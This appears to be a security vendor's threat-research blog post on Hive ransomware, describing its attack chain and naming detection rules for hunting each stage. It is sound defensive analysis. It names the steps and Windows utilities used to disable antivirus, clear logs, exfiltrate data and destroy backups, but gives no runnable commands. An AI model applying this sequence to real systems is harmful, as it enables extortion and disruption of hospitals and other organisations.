By Rabindra Dev Bhatta, Security Research
A comparatively new ransomware, Hive is around one-and-a-half years old in the wild, but it is already among the top ransomware threats in the industry. Threat actors have been using Hive to target a variety of companies and critical infrastructure sectors, particularly healthcare, government facilities, communications, critical manufacturing, and information technology.
According to the Joint Cybersecurity Advisory published by the FBI, CISA, and HHS as part of their #StopRansomware effort, as of November 2022, the Hive ransomware threat actors have targeted more than 1,300 businesses globally and have bagged almost US$100 million in ransom. Compared to other ransomware actors, the Hive syndicate functions in quite an organized manner with multiple portals and work distribution. Hive provides RaaS through its three primary API-based portals – affiliate, victims, and data leak site.
** Get research and analysis, insight, plus hints and tips, on how to detect, manage, and respond to Hive ransomware in the main blog.
Head to the contents and click each section for quick navigation.
A comparatively new ransomware, Hive is around one-and-a-half-years-old in the wild, but it is already among the top ransomware threats in the industry. Threat actors have been using Hive ransomware to target a variety of companies and critical infrastructure sectors, particularly healthcare, government facilities, communications, critical manufacturing, and information technology.
According to the Joint Cybersecurity Advisory published by the FBI, CISA, and HHS as part of their #StopRansomware effort, as of November 2022, the Hive ransomware threat actors have targeted more than 1,300 businesses globally and have bagged almost US$100 million in ransom.
Similar to BlackCat and LockBit, the Hive syndicate is a Ransomware-as-a-Service (RaaS) provider, that was first reported in June 2021 against a Canadian IT company. Hive made headlines in August 2021 for interrupting the clinical and financial activities of three hospitals in Ohio and West Virginia as a result of Hive’s ransomware assaults. On the ground level, this forced the emergency rooms to divert traffic, and cancel radiological tests and urgent surgery cases; while causing the FBI to issue alerts detailing the indications of compromise (IOCs) and tactics, techniques, and procedures (TTPs) used by Hive ransomware.
Compared to other ransomware actors, the Hive syndicate functions in quite an organized manner with multiple portals and work distribution. While the developers build, maintain, and upgrade the Hive infrastructures – malware variants, data leak website the “HiveLeaks” and the negotiation site; the affiliates are responsible to locate victims, infect them, steal their files, and spread Hive ransomware over the networks of victims. Hive provides RaaS through its three primary API-based portals – affiliate, victims, and data leak site.
We at Logpoint deployed multiple variations of the ransomware and have attempted to create a comprehensive detection and understanding of it in the following section.
Hive fast facts
First reported in June 2021 and has amassed almost $100 million in ransom from 1,300 global businesses.
Affiliates discovered to have used spam campaigns, leaked credentials, and vulnerable servers for initial access.
Targets healthcare, government facilities, communications, critical manufacturing, and information technology.
Known for strict negotiations and double or sometimes triple extortion methods for extorting the ransom.
Known to re-infect victim organizations that restore infrastructure without making a ransom payment.
Has multiple ransomware variants affecting Windows, Linux, FreeBSD, and VMware ESXi with the latest iteration written in Rust Programming Language, while the older ones developed in Go.
Technical analysis of Hive
For our research, the Hive ransomware variants in consideration were abstracted from vx-underground while samples from tria.ge sandbox were also referenced. The results are summarized below.
The common method of initial access, phishing with malicious attachments [T1566], and leaked/compromised credentials [T1078], remains a prominent approach for the Hive ransomware threat actors. Further, Hive actors have also been found to exploit vulnerabilities in public-facing applications [T1190]:
Therefore, it can be stated that the method for initial access into the target system depends on the affiliates’ capabilities.
Execution and persistence
Right after the Hive actors find their way into the target system, they attempt to establish persistence by executing obfuscated Powershell script [T1059] that is a part of the Cobalt Strike beaconing technique for command and control and lateral movement in the target network.
Following that, they begin executing multiple Powershell commands to stop/disable important security services and processes like SamSs, SDRSVC, SstpSvc, vmicvss, VSS, wbengine, WebClient, and UnistoreSvc_196e4 using system executables – “net.exe”/”net1.exe” and “sc.exe” that might otherwise hinder its attack chain.
The malware notoriously inhibits detection by modifying registry entries [T1112] and scheduling tasks through “reg.exe” and “schtask.exe” respectively, to disable/stop security monitoring services and Windows Defender Real-Time Protection.
Hive makes use of “MpCmdRun.exe” to delete anti-virus definitions and disable the protection status [T1562].
Further, Hive also removes its activity traces by clearing out system, security, and application logs [T1070] by exploiting the “wevtutil.exe“ binary.
Actions on objectives
Once the detections have been disabled, Hive quietly exfiltrates data archived through tools like “7-Zip” and “Rclone” to anonymous file sharing/cloud storage service [T1537] providers like “Mega“, “Anonfiles“, “Ufile“ and “Privatelab“, and then proceed to delete the shadow copies, using “vssadmin.exe” and “wmic.exe“ behind the user visibility zone to prevent any suspicion. Further, it also deletes the system state backups using “wbadmin.exe“ to make the system irrecoverable.
To leave no stone unturned, the malware performs one last thing before encrypting it all, that is, it modifies the boot configuration data of the system using “bcdedit.exe“ to restrict the system administrator’s access to the Windows Recovery Environment’s System Image Recovery capability and therefore inhibit system recovery [T1490].
The malware finally enacts its actual agenda – it executes the ransomware and encrypts all the files of the system [T1486]. The newer variants of the ransomware use Elliptic Curve Diffie-Hellmann (ECDH) with Curve25519 and XChaCha20-Poly1305 (authenticated encryption with ChaCha20 symmetric cipher) for the encryption. The ransomware iterates the action in all the systems it has access to.
Once the entire disk files have been encrypted, a message pops up in a “HOW_TO_DECRYPT.txt” notepad file, notifying the users about the incident that happened in their system, URL link, and credentials to log in to the hive’s .onion/ portal for negotiations with the “Sales Department”, and guidelines as a warning.
Hunting Hive with Logpoint
Let’s begin our hunt all the way from the start of the incident. A very common method among both threat actors and defenders, spearphishing is still the most adopted technique to exploit the human element and infiltrate the target system. Therefore, we can be on the lookout for suspicious processes spawned by Microsoft Office utilities:
We have also observed Hive exploiting the Microsoft Exchange server’s ProxyShell vulnerability. Therefore, suspicious activities can be monitored through, “Exchange ProxyShell Pattern Detected”
and “Successful Exchange ProxyShell Attack“
Next, another widely used hacking tool is the Cobalt Strike beaconing. This is used for execution and maintaining persistence in the system. At Logpoint, we have been continuously offering our customers detection and understanding of various hacking tools, techniques, and methods that are prominently used by threat actors for different purposes in most of their attack campaigns. As such, detection for tools like Cobalt Strike and Mimikatz, also leveraged by the Hive actors, have been published and reviewed time and again.
To take it a step further, it has also been found that Hive actors execute base64 encoded commands to bypass detection during the beaconing phase. Detection of commands executed for encoded keywords can be of huge interest to us and therefore can be viewed through “Malicious Base64 Encoded PowerShell Keywords in Command Lines Detected“
Hive actors then proceed with terminating/disabling multiple processes and system services. We can look into those with the desired level of consolidated visibility through “High Number of Service Stop or Task Kill in Short Span“
Here, we have considered the occurrence of the event – process stop or service disable, to be greater than ten times. You can modify it based on your environment and requirements.
In an attempt to evade native defenses and maintain stealth for its future activities, Hive begins to modify the registry values of Microsoft Windows Defender with “reg.exe“, which could otherwise possibly detect its activities and trigger alerts. Hence, making the detection of such nasty acts our top priority with “Windows Defender Antivirus Disabled via Registry Modification”.
“Windows Security Health Disabled via Registry Modification”
Hive exploits the Malware Protection Command Line Utility – “MpCmdRun.exe“, to remove any or all antivirus signature definitions present in the system. The detection can be achieved with “Microsoft Defender Antivirus Definitions Removal Detected“
“Microsoft Defender Disabling Attempt via PowerShell”
To leave no traces of its activities, Hive also clears all the system, security, and application logs mostly using the “wevtutil.exe“ system binary which can be detected by “Suspicious Eventlog Clear or Configuration Using Wevtutil Detected“
Once the actors are sure of having no obstruction, they begin exfiltrating important organizational data. We found the hive actors to use “7z.exe“ to exfiltrate compressed or encrypted data to cloud storage services like Mega, Anonfiles, and more. This can be easily detected.
Along with exfiltrating data, they begin to delete/destroy shadow copies and system state backups leaving the organization with no back-ups or recovery points, “Shadow Copy Deletion Using OS Utilities Detected“
Further, threat actors make sure to deactivate and completely turn off the system administrators’ access to Windows Recovery Environment abusing “bcdedit.exe“ to modify the boot policy, which can be detected as, “Possible Modification of Boot Configuration“
The final act of the show – ransomware – begins its encryption after all this and drops a message through a notepad text file. Early detection is important.